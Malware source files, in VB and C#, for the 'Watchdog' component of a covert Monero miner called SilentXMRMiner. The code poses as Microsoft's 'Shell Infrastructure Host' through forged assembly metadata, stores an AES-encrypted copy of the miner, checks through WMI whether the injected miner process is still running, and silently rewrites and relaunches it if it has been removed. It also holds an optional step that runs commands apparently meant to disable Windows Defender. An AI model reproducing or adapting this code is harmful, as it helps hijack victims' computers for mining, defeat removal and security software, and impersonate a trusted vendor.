File: SilentXMRMiner/Resources/Watchdog.vb
Imports System.Security.Cryptography
Imports Microsoft.Win32
Imports System.Management
Imports System
Imports System.Net.Sockets
Imports Microsoft.VisualBasic
Imports System.Diagnostics
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Collections.Generic
Imports System.Drawing
Imports System.Windows.Forms
Imports System.IO
Imports System.Net
Imports System.Drawing.Drawing2D
Imports System.Drawing.Imaging
Imports System.Threading
Imports System.Security
Imports System.Text

<Assembly: AssemblyTitle("Shell Infrastructure Host")>
<Assembly: AssemblyDescription("Shell Infrastructure Host")>
<Assembly: AssemblyProduct("Microsoft® Windows® Operating System")>
<Assembly: AssemblyCopyright("© Microsoft Corporation. All Rights Reserved.")>
<Assembly: AssemblyFileVersion("10.0.19041.746")>

Public Class Watchdog

    Public Shared xm As Byte() = New Byte() {}
    Public Shared plp As String = ""
    Public Shared checkcount As Integer = 0

    Public Shared Sub Main()
        Try
            plp = PayloadPath
            xm = AES_Encryptor(System.IO.File.ReadAllBytes(plp))

            WDLoop()

        Catch ex As Exception
            Environment.Exit(0)
        End Try
    End Sub

    Public Shared Sub WDLoop()
        Try
            If Not CheckProc(GetString("#InjectionTarget"), "--donate-l") Then
                If Not System.IO.File.Exists(plp) Then
                    System.IO.File.WriteAllBytes(plp, AES_Decryptor(xm))
                    Process.Start(plp)
                Else
                    If checkcount < 2 Then
                        checkcount += 1
                    Else
                        checkcount = 0
                        Process.Start(plp)
                    End If
                End If
            Else
                checkcount = 0
                If Not System.IO.File.Exists(plp) Then
                    System.IO.File.WriteAllBytes(plp, AES_Decryptor(xm))
                    Process.Start(plp)
                End If
            End If

            If IsNumeric("#STARTDELAY") AndAlso CInt("#STARTDELAY") > 0 Then
                System.Threading.Thread.Sleep(CInt("#STARTDELAY") * 1000 + 5000)
            Else
                System.Threading.Thread.Sleep(10000)
            End If

            WDLoop()
        Catch ex As Exception
        End Try
    End Sub

    Public Shared Function GetString(ByVal input As String)
        Return Encoding.ASCII.GetString(AES_Decryptor(Convert.FromBase64String(input)))
    End Function

    Public Shared Function CheckProc(ByVal process As String, ByVal contains As String)
        On Error Resume Next
        Dim options As ConnectionOptions = New ConnectionOptions()
        options.Impersonation = ImpersonationLevel.Impersonate
        Dim scope As ManagementScope = New ManagementScope("\\" + Environment.UserDomainName + "\root\cimv2", options)
        scope.Connect()

        Dim wmiQuery As String = String.Format("Select CommandLine from Win32_Process where Name='{0}'", process)
        Dim query As ObjectQuery = New ObjectQuery(wmiQuery)
        Dim managementObjectSearcher As ManagementObjectSearcher = New ManagementObjectSearcher(scope, query)
        Dim managementObjectCollection As ManagementObjectCollection = managementObjectSearcher.Get()

        For Each retObject As ManagementObject In managementObjectCollection
            If retObject("CommandLine").ToString().Contains(contains) Then
                Return True
            End If
        Next
        Return False
    End Function

    Public Shared Function AES_Decryptor(ByVal input As Byte()) As Byte()
        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes("#IV")
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes("#SALT")
        Dim k1 As New Rfc2898DeriveBytes("#KEY", saltValueBytes, 100)
        Dim symmetricKey As New RijndaelManaged
        symmetricKey.KeySize = 256
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform = symmetricKey.CreateDecryptor(k1.GetBytes(16), initVectorBytes)
        Using mStream As New MemoryStream()
            Using cStream As New CryptoStream(mStream, decryptor, CryptoStreamMode.Write)
                cStream.Write(input, 0, input.Length)
                cStream.Close()
            End Using
            Return mStream.ToArray()
        End Using
    End Function

    Public Shared Function AES_Encryptor(ByVal input As Byte()) As Byte()
        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes("#IV")
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes("#SALT")
        Dim k1 As New Rfc2898DeriveBytes("#KEY", saltValueBytes, 100)
        Dim symmetricKey As New RijndaelManaged
        symmetricKey.KeySize = 256
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(k1.GetBytes(16), initVectorBytes)
        Using mStream As New MemoryStream()
            Using cStream As New CryptoStream(mStream, encryptor, CryptoStreamMode.Write)
                cStream.Write(input, 0, input.Length)
                cStream.Close()
            End Using
            Return mStream.ToArray()
        End Using
    End Function

End Class

File: SilentXMRMiner/Resources/Watchdog.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Reflection;
using System.Security.Principal;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
#if DefDebug
using System.Windows.Forms;
#endif

[assembly: AssemblyTitle("Shell Infrastructure Host")]
[assembly: AssemblyDescription("Shell Infrastructure Host")]
[assembly: AssemblyProduct("Microsoft® Windows® Operating System")]
[assembly: AssemblyCopyright("© Microsoft Corporation. All Rights Reserved.")]
[assembly: AssemblyFileVersion("10.0.19041.746")]

public partial class RProgram
{
    public static byte[] _rxm_ = { };
    public static int _rcheckcount_ = 0;
    public static string _rplp_ = PayloadPath;

    public static void Main()
    {
        try
        {
            _rxm_ = _rAESMethod_(File.ReadAllBytes(_rplp_), true);
            _rWDLoop_();
        }
        catch (Exception ex)
        {
#if DefDebug
            MessageBox.Show("W1: " + Environment.NewLine + ex.ToString());
#endif
            Environment.Exit(0);
        }
    }

    public static void _rWDLoop_()
    {
        try
        {
            bool _rarg2_ = false;

            var _rarg4_ = new ConnectionOptions();
            _rarg4_.Impersonation = ImpersonationLevel.Impersonate;
            var _rarg5_ = new ManagementScope(@"\root\cimv2", _rarg4_);
            _rarg5_.Connect();

            var _rarg7_ = new ManagementObjectSearcher(_rarg5_, new ObjectQuery(string.Format(_rGetString_("#MINERQUERY"), _rGetString_("#InjectionTarget")))).Get();
            foreach (ManagementObject retObject in _rarg7_)
            {
                if (retObject != null && retObject["CommandLine"] != null && retObject["CommandLine"].ToString().Contains(_rGetString_("#MINERID")))
                {
                    _rarg2_ = true;
                }
            }

            if (!File.Exists(_rplp_) || !_rarg2_)
            {
                if (!File.Exists(_rplp_) || _rcheckcount_ > 2)
                {
                    _rcheckcount_ = 0;
#if DefKillWD
                    try
                    {
                        _rCommand_(_rGetString_("#SCMD"), _rGetString_("#KillWDCommands"));
                    }
                    catch (Exception ex)
                    {
#if DefDebug
                    MessageBox.Show("W2.5: " + Environment.NewLine + ex.ToString());
#endif
                    }
#endif
                    File.WriteAllBytes(_rplp_, _rAESMethod_(_rxm_));
                    Process.Start(new ProcessStartInfo
                    {
                        FileName = _rplp_,
                        WindowStyle = ProcessWindowStyle.Hidden,
                        WorkingDirectory = Path.GetDirectoryName(_rplp_),
                        CreateNoWindow = true,
                    });
                    Environment.Exit(0);
                }
                else
                {
                    _rcheckcount_ += 1;
                }

            }
            Thread.Sleep(startDelay * 1000 + 20000);
            _rWDLoop_();
        }
        catch (Exception ex)
        {
#if DefDebug
            MessageBox.Show("W2: " + Environment.NewLine + ex.ToString());
#endif
        }

    }

    public static string _rGetString_(string _rarg1_)
    {
        return Encoding.UTF8.GetString(_rAESMethod_(Convert.FromBase64String(_rarg1_)));
    }

    public static byte[] _rAESMethod_(byte[] _rarg1_, bool _rarg2_ = false)
    {
        var _rarg3_ = Encoding.ASCII.GetBytes("#IV");
        var _rarg4_ = new Rfc2898DeriveBytes("#KEY", Encoding.ASCII.GetBytes("#SALT"), 100);
        var _rarg5_ = new RijndaelManaged() { KeySize = 256, Mode = CipherMode.CBC };
        var _rarg6_ = _rarg2_ ? _rarg5_.CreateEncryptor(_rarg4_.GetBytes(16), _rarg3_) : _rarg5_.CreateDecryptor(_rarg4_.GetBytes(16), _rarg3_);
        using (var _rarg7_ = new MemoryStream())
        {
            using (var _rarg8_ = new CryptoStream(_rarg7_, _rarg6_, CryptoStreamMode.Write))
            {
                _rarg8_.Write(_rarg1_, 0, _rarg1_.Length);
                _rarg8_.Close();
            }
            return _rarg7_.ToArray();
        }
    }

    public static void _rCommand_(string _rarg1_, string _rarg2_)
    {
        try
        {
            Process.Start(new ProcessStartInfo
            {
                FileName = _rarg1_,
                Arguments = _rarg2_,
                WorkingDirectory = Environment.SystemDirectory,
                WindowStyle = ProcessWindowStyle.Hidden,
                CreateNoWindow = true,
                UseShellExecute = false,
                RedirectStandardOutput = true
            });
        }
        catch (Exception ex)
        {
#if DefDebug
                MessageBox.Show("M.C: " + Environment.NewLine + ex.ToString());
#endif
        }
    }
}